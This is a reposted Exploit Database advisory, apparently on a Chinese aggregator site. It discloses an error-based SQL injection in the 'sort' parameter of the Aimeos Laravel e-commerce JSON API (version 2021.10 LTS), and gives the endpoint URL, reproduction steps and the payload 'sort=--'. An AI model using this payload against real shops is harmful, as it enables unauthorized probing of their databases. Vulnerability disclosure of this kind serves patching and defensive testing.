Aimeos Laravel ecommerce platform 2021.10 LTS – ‘sort’ SQL injection

• Exploit Database
• 42 阅读

• 作者： Ilker Burak ADIYAMAN
  日期： 2021-11-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50538/

• # Exploit Title: Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection
  # Date: 20/11/2021
  # Exploit Author: Ilker Burak ADIYAMAN
  # Vendor Homepage: https://aimeos.org
  # Software Link: https://aimeos.org/laravel-ecommerce-package
  # Version: Aimeos 2021.10 LTS
  # Tested on: MacOSX
  
  *Description:*
  
  The Aimeos E-Commerce framework Laravel application is vulnerable to SQL injection via the 'sort' parameter on the json api.
  
  ==================== 1. SQLi ====================
  
  https://127.0.0.1/default/jsonapi/review?sort=-ctime
  
  The "sort" parameter is vulnerable to SQL injection, reveals table and column names.
  
  step 1 : Copy json api GET request above.
  step 2 : Change sort parameter value to --
  
  ----------------------------------------------------------------------
  Parameter: sort (GET)
  Type: error based
  Title: GET parameter 'sort' appears to be injectable
  Payload: sort=--